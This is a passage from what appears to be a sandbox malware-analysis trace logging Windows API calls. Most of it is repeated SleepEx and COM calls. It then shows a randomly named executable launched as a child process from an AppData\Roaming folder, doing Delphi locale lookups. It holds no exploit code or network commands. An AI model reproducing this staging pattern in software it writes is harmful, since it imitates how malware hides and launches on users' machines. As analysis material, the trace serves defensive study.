SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 238 os_tid = 0x638 Thread: id = 239 os_tid = 0x738 Thread: id = 240 os_tid = 0x35c Thread: id = 241 os_tid = 0x614 [0244.627] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0244.628] CoGetContextToken (in: pToken=0x674f8c4 | out: pToken=0x674f8c4) returned 0x0 [0244.628] IUnknown:QueryInterface (in: This=0x766108, riid=0x749ad8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x674f8e8 | out: ppvObject=0x674f8e8*=0x766114) returned 0x0 [0244.629] IComThreadingInfo:GetCurrentThreadType (in: This=0x766114, pThreadType=0x674f914 | out: pThreadType=0x674f914*=0) returned 0x0 [0244.629] IUnknown:Release (This=0x766114) returned 0x0 [0244.629] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0244.629] CoUninitialize () [0244.629] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.639] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.639] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.639] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.645] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.654] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.654] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.654] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.657] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.657] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.657] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.657] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.660] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.660] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.660] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.673] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.673] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.673] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.673] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.673] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.934] CoUninitialize () Thread: id = 242 os_tid = 0x51c Thread: id = 256 os_tid = 0x750 Process: id = "16" image_name = "sjfhjjskfsf.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe" page_root = "0x5dd46000" os_pid = "0x7f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x74c" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 2028 18038251" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f781" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 160 os_tid = 0x7f8 [0207.664] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0207.664] GetKeyboardType (nTypeFlag=0) returned 4 [0207.665] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 2028 18038251" [0207.665] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0207.665] GetVersion () returned 0x1db10106 [0207.665] GetVersion () returned 0x1db10106 [0207.665] GetCurrentThreadId () returned 0x7f8 [0207.665] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0207.816] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0207.816] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0207.817] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0207.817] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0207.817] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", iMaxLength=261 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" [0207.817] GetThreadLocale () returned 0x409 [0207.817] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0207.818] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe") returned 57 [0207.818] lstrcpynA (in: lpString1=0x18f909, lpString2="ENU", iMaxLength=207 | out: lpString1="ENU") returned="ENU" [0207.818] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0207.818] lstrcpynA (in: lpString1=0x18f909, lpString2="EN", iMaxLength=207 | out: lpString1="EN") returned="EN" [0207.818] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.EN", 